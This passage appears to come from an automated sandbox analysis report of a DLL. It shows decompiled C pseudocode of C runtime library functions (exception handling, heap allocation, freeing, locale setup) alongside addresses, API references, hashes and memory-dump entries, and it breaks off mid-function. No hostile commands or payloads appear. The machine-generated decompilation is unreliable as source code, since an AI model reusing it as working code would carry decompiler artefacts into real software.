                          • GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,6E2533A0,?,?,00000000,?,?,?), ref: 6E252C6D
                          • __fassign.LIBCMT ref: 6E252CE8
                          • __fassign.LIBCMT ref: 6E252D03
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6E252D29
                          • WriteFile.KERNEL32(?,00000000,00000000,6E2533A0,00000000,?,?,?,?,?,?,?,?,?,6E2533A0,?), ref: 6E252D48
                          • WriteFile.KERNEL32(?,?,00000001,6E2533A0,00000000,?,?,?,?,?,?,?,?,?,6E2533A0,?), ref: 6E252D81
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: 16dbb80d325d00d4ea424f02295bf5976511163efa669ab6d703e8c571998704
                          • Instruction ID: d6a1b6dbef85d15a2449a7ad8e6a947c604b614d6ee9e06ed70c267ba889a7c5
                          • Opcode Fuzzy Hash: 16dbb80d325d00d4ea424f02295bf5976511163efa669ab6d703e8c571998704
                          • Instruction Fuzzy Hash: A451A4B290064A9FDB00CFA8C985AEEBBFAEF0A300F15455AE955F7381D730D951CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E223F60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON
                          Download Yara Rule
                          C-Code - Quality: 52%
                          			E6E223F60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				signed int _t48;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				long _t95;
				long _t97;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t112;

				_t86 = __edx;
				_push(__ebx);
				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t93 = _t74 + 0x10;
				_t48 =  *(_t74 + 8) ^  *0x6e2c506c;
				_push(_t93);
				_push(_t48);
				_v16 = 1;
				_v20 = _t93;
				_v12 = _t48;
				E6E223F20(_t74, __edx);
				E6E225267(_a12);
				_t51 = _a4;
				_t105 = _t104 + 0xc;
				_t90 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						_t86 = 0xfffffffe;
						E6E225920(_t74, 0xfffffffe, _t93, 0x6e2c506c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t86 = _t93;
								_t60 = E6E2258D0(_t79, _t93);
								_t80 = 1;
								_v5 = 1;
								_t112 = _t60;
								if(_t112 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									_push(_v12);
									E6E223F20(_t74, _t86);
									goto L15;
								} else {
									if(_t112 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6e26e698;
											if(__eflags != 0) {
												_t70 = E6E267400(__eflags, 0x6e26e698);
												_t105 = _t105 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t97 =  *0x6e26e698; // 0x6e223b1a
													 *0x6e26a26c(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t105 = _t105 + 8;
												}
												_t61 = _a4;
											}
										}
										_t87 = _t61;
										E6E225904(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											_t87 = _t90;
											E6E225920(_t63, _t90, _t93, 0x6e2c506c);
											_t63 = _a8;
										}
										_push(_t93);
										_push(_v16);
										 *((intOrPtr*)(_t63 + 0xc)) = _t74;
										E6E223F20(_t74, _t87);
										_t88 = _t93;
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6E2258E8();
										asm("int3");
										_t100 = _t98;
										_t102 = _t100;
										_push(_t102);
										_push(_t93);
										_t95 = _v40;
										__eflags = _t95 - 0xffffffe0;
										if(_t95 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6E242281())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t95;
											if(_t95 == 0) {
												_t95 = _t95 + 1;
											}
											while(1) {
												_t66 = RtlAllocateHeap( *0x6e2c7b04, 0, _t95); // executed
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6E25BEB2();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6E249256(_t74, _t83, _t88, _t90, __eflags, _t95);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t90 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}




































                          0x6e223f60
                          0x6e223f66
                          0x6e223f67
                          0x6e223f6b
                          0x6e223f6c
                          0x6e223f73
                          0x6e223f76
                          0x6e223f7c
                          0x6e223f7d
                          0x6e223f7e
                          0x6e223f85
                          0x6e223f88
                          0x6e223f8b
                          0x6e223f93
                          0x6e223f98
                          0x6e223f9b
                          0x6e223f9e
                          0x6e223fa5
                          0x6e224006
                          0x6e224009
                          0x6e224011
                          0x6e224018
                          0x00000000
                          0x6e224018
                          0x00000000
                          0x6e223fa7
                          0x6e223fa7
                          0x6e223fad
                          0x6e223fb3
                          0x6e223fb9
                          0x6e224029
                          0x6e224032
                          0x6e223fbb
                          0x6e223fc0
                          0x6e223fc0
                          0x6e223fc3
                          0x6e223fc6
                          0x6e223fc9
                          0x6e223fcc
                          0x6e223fcf
                          0x6e223fd2
                          0x6e223fd7
                          0x6e223fed
                          0x00000000
                          0x6e223fd9
                          0x6e223fd9
                          0x6e223fdb
                          0x6e223fe0
                          0x6e223fe2
                          0x6e223fe5
                          0x6e223fe7
                          0x6e223ffd
                          0x6e22401d
                          0x6e22401d
                          0x6e22401e
                          0x6e224021
                          0x00000000
                          0x6e223fe9
                          0x6e223fe9
                          0x6e224033
                          0x6e224036
                          0x6e22403c
                          0x6e22403e
                          0x6e224045
                          0x6e22404c
                          0x6e224051
                          0x6e224054
                          0x6e224056
                          0x6e224058
                          0x6e224065
                          0x6e22406b
                          0x6e22406d
                          0x6e224070
                          0x6e224070
                          0x6e224073
                          0x6e224073
                          0x6e224045
                          0x6e224079
                          0x6e22407b
                          0x6e224080
                          0x6e224083
                          0x6e224086
                          0x6e22408e
                          0x6e224092
                          0x6e224097
                          0x6e224097
                          0x6e22409a
                          0x6e22409b
                          0x6e22409e
                          0x6e2240a1
                          0x6e2240ac
                          0x6e2240ae
                          0x6e2240b1
                          0x6e2240b6
                          0x6e2240ba
                          0x6e2423d7
                          0x6e24f26f
                          0x6e24f272
                          0x6e24f273
                          0x6e24f276
                          0x6e24f279
                          0x6e24f2ab
                          0x6e24f2b0
                          0x6e24f2b6
                          0x6e24f2b6
                          0x6e24f27b
                          0x6e24f27b
                          0x6e24f27d
                          0x6e24f27f
                          0x6e24f27f
                          0x6e24f296
                          0x6e24f29f
                          0x6e24f2a5
                          0x6e24f2a7
                          0x00000000
                          0x00000000
                          0x6e24f287
                          0x6e24f289
                          0x00000000
                          0x6e24f28b
                          0x6e24f28c
                          0x6e24f291
                          0x6e24f292
                          0x6e24f294
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24f294
                          0x00000000
                          0x6e24f289
                          0x6e24f2a9
                          0x6e24f2b8
                          0x6e24f2ba
                          0x6e223feb
                          0x00000000
                          0x6e223feb
                          0x6e223fe9
                          0x6e223fe7
                          0x00000000
                          0x6e223ff0
                          0x6e223ff0
                          0x6e223ff2
                          0x6e223ff9
                          0x00000000
                          0x6e223ffb
                          0x00000000
                          0x6e223ff9
                          0x6e223fb9
                          0x00000000

                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6E223F8B
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6E223F93
                          • _ValidateLocalCookies.LIBCMT ref: 6E224021
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6E22404C
                          • _ValidateLocalCookies.LIBCMT ref: 6E2240A1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 4036118a72cd09b98fd7ab41bcf03e77bdc2c174d201152525f5a170ef0b750f
                          • Instruction ID: d5a374a0051502dc650a2e16d71fb59f373354c9ded5dce8767f4bfa821dc166
                          • Opcode Fuzzy Hash: 4036118a72cd09b98fd7ab41bcf03e77bdc2c174d201152525f5a170ef0b750f
                          • Instruction Fuzzy Hash: 3641B434A0020E9FCF04DFE9D844A9E7BB6BF45329F108565E8149B395D7B1DA42CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25D29B, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E25D29B(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6E25CF81(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E6E25CF81(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E6E25CF81(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E6E25CF81(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E6E25CF81(_t5, 2);
					E6E24CBD3( *((intOrPtr*)(_t45 + 0xa0)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0xa4)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E6E25CF81(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E6E25CF81(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E6E25CF81(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E6E25CF81(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E6E25CF81(_t13, 2);
					E6E24CBD3( *((intOrPtr*)(_t45 + 0x154)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0x158)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0x15c)));
					return E6E24CBD3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}





                          0x6e25d2a1
                          0x6e25d2a6
                          0x6e25d2af
                          0x6e25d2b4
                          0x6e25d2ba
                          0x6e25d2bf
                          0x6e25d2c5
                          0x6e25d2ca
                          0x6e25d2d0
                          0x6e25d2d5
                          0x6e25d2de
                          0x6e25d2e9
                          0x6e25d2f4
                          0x6e25d2ff
                          0x6e25d304
                          0x6e25d30d
                          0x6e25d312
                          0x6e25d31b
                          0x6e25d323
                          0x6e25d32c
                          0x6e25d331
                          0x6e25d33a
                          0x6e25d33f
                          0x6e25d348
                          0x6e25d353
                          0x6e25d35e
                          0x6e25d369
                          0x00000000
                          0x6e25d379
                          0x6e25d37e

                          APIs
                            • Part of subcall function 6E25CF81: _free.LIBCMT ref: 6E25CFAA
                          • _free.LIBCMT ref: 6E25D2E9
                            • Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
                            • Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB
                          • _free.LIBCMT ref: 6E25D2F4
                          • _free.LIBCMT ref: 6E25D2FF
                          • _free.LIBCMT ref: 6E25D353
                          • _free.LIBCMT ref: 6E25D35E
                          • _free.LIBCMT ref: 6E25D369
                          • _free.LIBCMT ref: 6E25D374
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
                          • Instruction ID: 8fa4785d91d2f5e5975e706f67165941b4479354c1bb5b7543d275e210967cf9
                          • Opcode Fuzzy Hash: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
                          • Instruction Fuzzy Hash: 4D118175944B0CFBE520A7F0CD07FCBB7AE9F00B14F508D16E29AAE251EB39B5144650
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20EF91, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20EF91(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t307;
				signed int _t308;
				void* _t320;
				void* _t333;
				void* _t346;
				void* _t359;
				void* _t372;
				void* _t385;
				void* _t398;
				void* _t411;
				void* _t424;
				void* _t437;
				void* _t450;
				void* _t463;
				void* _t476;
				void* _t489;
				void* _t502;
				void* _t515;
				void* _t528;
				void* _t541;
				void* _t554;
				void* _t567;
				signed int _t815;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				void* _t946;

				_t879 = __edx;
				_t668 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t946 - 0x14, 0);
				_t903 =  *0x6e2c6de4; // 0x0
				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
				 *(_t946 - 0x10) = _t903;
				_t307 = E6E1E161C(0x6e2c6d90);
				_t671 =  *((intOrPtr*)(_t946 + 8));
				_t308 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t307);
				_t881 = _t308;
				if(_t308 != 0) {
					L5:
					E6E2066BA(_t946 - 0x14);
					return E6E220075(_t881);
				} else {
					if(_t903 == 0) {
						_push( *((intOrPtr*)(_t946 + 8)));
						_push(_t946 - 0x10);
						__eflags = E6E210D03(__ebx, _t671, __edx, _t881, _t903) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t946 - 0x20);
							E6E223D74(_t946 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t881, _t903, 0x14);
							E6E206653(_t946 - 0x14, 0);
							_t904 =  *0x6e2c6db4; // 0x0
							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
							 *(_t946 - 0x10) = _t904;
							_t320 = E6E1E161C(0x6e2c6d68);
							_t678 =  *((intOrPtr*)(_t946 + 8));
							_t882 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t320);
							__eflags = _t882;
							if(_t882 != 0) {
								L12:
								E6E2066BA(_t946 - 0x14);
								return E6E220075(_t882);
							} else {
								__eflags = _t904;
								if(_t904 == 0) {
									_push( *((intOrPtr*)(_t946 + 8)));
									_push(_t946 - 0x10);
									__eflags = E6E210DA5(_t668, _t678, __edx, _t882, _t904) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t946 - 0x20);
										E6E223D74(_t946 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t668, _t882, _t904, 0x14);
										E6E206653(_t946 - 0x14, 0);
										_t905 =  *0x6e2c6dd4; // 0x0
										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
										 *(_t946 - 0x10) = _t905;
										_t333 = E6E1E161C(0x6e2c6b28);
										_t685 =  *((intOrPtr*)(_t946 + 8));
										_t883 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t333);
										__eflags = _t883;
										if(_t883 != 0) {
											L19:
											E6E2066BA(_t946 - 0x14);
											return E6E220075(_t883);
										} else {
											__eflags = _t905;
											if(_t905 == 0) {
												_push( *((intOrPtr*)(_t946 + 8)));
												_push(_t946 - 0x10);
												__eflags = E6E210E47(_t668, _t685, __edx, _t883, _t905) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t946 - 0x20);
													E6E223D74(_t946 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t668, _t883, _t905, 0x14);
													E6E206653(_t946 - 0x14, 0);
													_t906 =  *0x6e2c6de8; // 0x0
													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
													 *(_t946 - 0x10) = _t906;
													_t346 = E6E1E161C(0x6e2c6d94);
													_t692 =  *((intOrPtr*)(_t946 + 8));
													_t884 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t346);
													__eflags = _t884;
													if(_t884 != 0) {
														L26:
														E6E2066BA(_t946 - 0x14);
														return E6E220075(_t884);
													} else {
														__eflags = _t906;
														if(_t906 == 0) {
															_push( *((intOrPtr*)(_t946 + 8)));
															_push(_t946 - 0x10);
															__eflags = E6E210EB7(_t668, _t692, _t879, _t884, _t906) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t946 - 0x20);
																E6E223D74(_t946 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t668, _t884, _t906, 0x14);
																E6E206653(_t946 - 0x14, 0);
																_t907 =  *0x6e2c6db8; // 0x0
																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																 *(_t946 - 0x10) = _t907;
																_t359 = E6E1E161C(0x6e2c6d6c);
																_t699 =  *((intOrPtr*)(_t946 + 8));
																_t885 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t359);
																__eflags = _t885;
																if(_t885 != 0) {
																	L33:
																	E6E2066BA(_t946 - 0x14);
																	return E6E220075(_t885);
																} else {
																	__eflags = _t907;
																	if(_t907 == 0) {
																		_push( *((intOrPtr*)(_t946 + 8)));
																		_push(_t946 - 0x10);
																		__eflags = E6E210F1F(_t668, _t699, _t879, _t885, _t907) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t946 - 0x20);
																			E6E223D74(_t946 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t668, _t885, _t907, 0x14);
																			E6E206653(_t946 - 0x14, 0);
																			_t908 =  *0x6e2c6dec; // 0x0
																			 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																			 *(_t946 - 0x10) = _t908;
																			_t372 = E6E1E161C(0x6e2c6d98);
																			_t706 =  *((intOrPtr*)(_t946 + 8));
																			_t886 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t372);
																			__eflags = _t886;
																			if(_t886 != 0) {
																				L40:
																				E6E2066BA(_t946 - 0x14);
																				return E6E220075(_t886);
																			} else {
																				__eflags = _t908;
																				if(_t908 == 0) {
																					_push( *((intOrPtr*)(_t946 + 8)));
																					_push(_t946 - 0x10);
																					__eflags = E6E210F87(_t668, _t706, _t879, _t886, _t908) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t946 - 0x20);
																						E6E223D74(_t946 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t668, _t886, _t908, 0x14);
																						E6E206653(_t946 - 0x14, 0);
																						_t909 =  *0x6e2c6dbc; // 0x0
																						 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																						 *(_t946 - 0x10) = _t909;
																						_t385 = E6E1E161C(0x6e2c6d70);
																						_t713 =  *((intOrPtr*)(_t946 + 8));
																						_t887 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t385);
																						__eflags = _t887;
																						if(_t887 != 0) {
																							L47:
																							E6E2066BA(_t946 - 0x14);
																							return E6E220075(_t887);
																						} else {
																							__eflags = _t909;
																							if(_t909 == 0) {
																								_push( *((intOrPtr*)(_t946 + 8)));
																								_push(_t946 - 0x10);
																								__eflags = E6E210FEF(_t668, _t713, _t879, _t887, _t909) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t946 - 0x20);
																									E6E223D74(_t946 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t668, _t887, _t909, 0x14);
																									E6E206653(_t946 - 0x14, 0);
																									_t910 =  *0x6e2c6df0; // 0x0
																									 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																									 *(_t946 - 0x10) = _t910;
																									_t398 = E6E1E161C(0x6e2c6d9c);
																									_t720 =  *((intOrPtr*)(_t946 + 8));
																									_t888 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t398);
																									__eflags = _t888;
																									if(_t888 != 0) {
																										L54:
																										E6E2066BA(_t946 - 0x14);
																										return E6E220075(_t888);
																									} else {
																										__eflags = _t910;
																										if(_t910 == 0) {
																											_push( *((intOrPtr*)(_t946 + 8)));
																											_push(_t946 - 0x10);
																											__eflags = E6E211057(_t668, _t720, _t879, _t888, _t910) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t946 - 0x20);
																												E6E223D74(_t946 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t668, _t888, _t910, 0x14);
																												E6E206653(_t946 - 0x14, 0);
																												_t911 =  *0x6e2c6dc0; // 0x0
																												 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																												 *(_t946 - 0x10) = _t911;
																												_t411 = E6E1E161C(0x6e2c6d74);
																												_t727 =  *((intOrPtr*)(_t946 + 8));
																												_t889 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t411);
																												__eflags = _t889;
																												if(_t889 != 0) {
																													L61:
																													E6E2066BA(_t946 - 0x14);
																													return E6E220075(_t889);
																												} else {
																													__eflags = _t911;
																													if(_t911 == 0) {
																														_push( *((intOrPtr*)(_t946 + 8)));
																														_push(_t946 - 0x10);
																														__eflags = E6E2110BF(_t668, _t727, _t879, _t889, _t911) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t946 - 0x20);
																															E6E223D74(_t946 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t668, _t889, _t911, 0x14);
																															E6E206653(_t946 - 0x14, 0);
																															_t912 =  *0x6e2c6df8; // 0x0
																															 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																															 *(_t946 - 0x10) = _t912;
																															_t424 = E6E1E161C(0x6e2c6da4);
																															_t734 =  *((intOrPtr*)(_t946 + 8));
																															_t890 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t424);
																															__eflags = _t890;
																															if(_t890 != 0) {
																																L68:
																																E6E2066BA(_t946 - 0x14);
																																return E6E220075(_t890);
																															} else {
																																__eflags = _t912;
																																if(_t912 == 0) {
																																	_push( *((intOrPtr*)(_t946 + 8)));
																																	_push(_t946 - 0x10);
																																	__eflags = E6E211127(_t668, _t734, _t879, _t890, _t912) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t946 - 0x20);
																																		E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t668, _t890, _t912, 0x14);
																																		E6E206653(_t946 - 0x14, 0);
																																		_t913 =  *0x6e2c6df4; // 0x0
																																		 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																		 *(_t946 - 0x10) = _t913;
																																		_t437 = E6E1E161C(0x6e2c6da0);
																																		_t741 =  *((intOrPtr*)(_t946 + 8));
																																		_t891 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t437);
																																		__eflags = _t891;
																																		if(_t891 != 0) {
																																			L75:
																																			E6E2066BA(_t946 - 0x14);
																																			return E6E220075(_t891);
																																		} else {
																																			__eflags = _t913;
																																			if(_t913 == 0) {
																																				_push( *((intOrPtr*)(_t946 + 8)));
																																				_push(_t946 - 0x10);
																																				__eflags = E6E2111AB(_t668, _t741, _t879, _t891, _t913) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t946 - 0x20);
																																					E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t668, _t891, _t913, 0x14);
																																					E6E206653(_t946 - 0x14, 0);
																																					_t914 =  *0x6e2c6dc8; // 0x0
																																					 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																					 *(_t946 - 0x10) = _t914;
																																					_t450 = E6E1E161C(0x6e2c6d7c);
																																					_t748 =  *((intOrPtr*)(_t946 + 8));
																																					_t892 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t450);
																																					__eflags = _t892;
																																					if(_t892 != 0) {
																																						L82:
																																						E6E2066BA(_t946 - 0x14);
																																						return E6E220075(_t892);
																																					} else {
																																						__eflags = _t914;
																																						if(_t914 == 0) {
																																							_push( *((intOrPtr*)(_t946 + 8)));
																																							_push(_t946 - 0x10);
																																							__eflags = E6E211230(_t668, _t748, _t879, _t892, _t914) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t946 - 0x20);
																																								E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t668, _t892, _t914, 0x14);
																																								E6E206653(_t946 - 0x14, 0);
																																								_t915 =  *0x6e2c6dc4; // 0x0
																																								 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																								 *(_t946 - 0x10) = _t915;
																																								_t463 = E6E1E161C(0x6e2c6d78);
																																								_t755 =  *((intOrPtr*)(_t946 + 8));
																																								_t893 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t463);
																																								__eflags = _t893;
																																								if(_t893 != 0) {
																																									L89:
																																									E6E2066BA(_t946 - 0x14);
																																									return E6E220075(_t893);
																																								} else {
																																									__eflags = _t915;
																																									if(_t915 == 0) {
																																										_push( *((intOrPtr*)(_t946 + 8)));
																																										_push(_t946 - 0x10);
																																										__eflags = E6E2112B4(_t668, _t755, _t879, _t893, _t915) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t946 - 0x20);
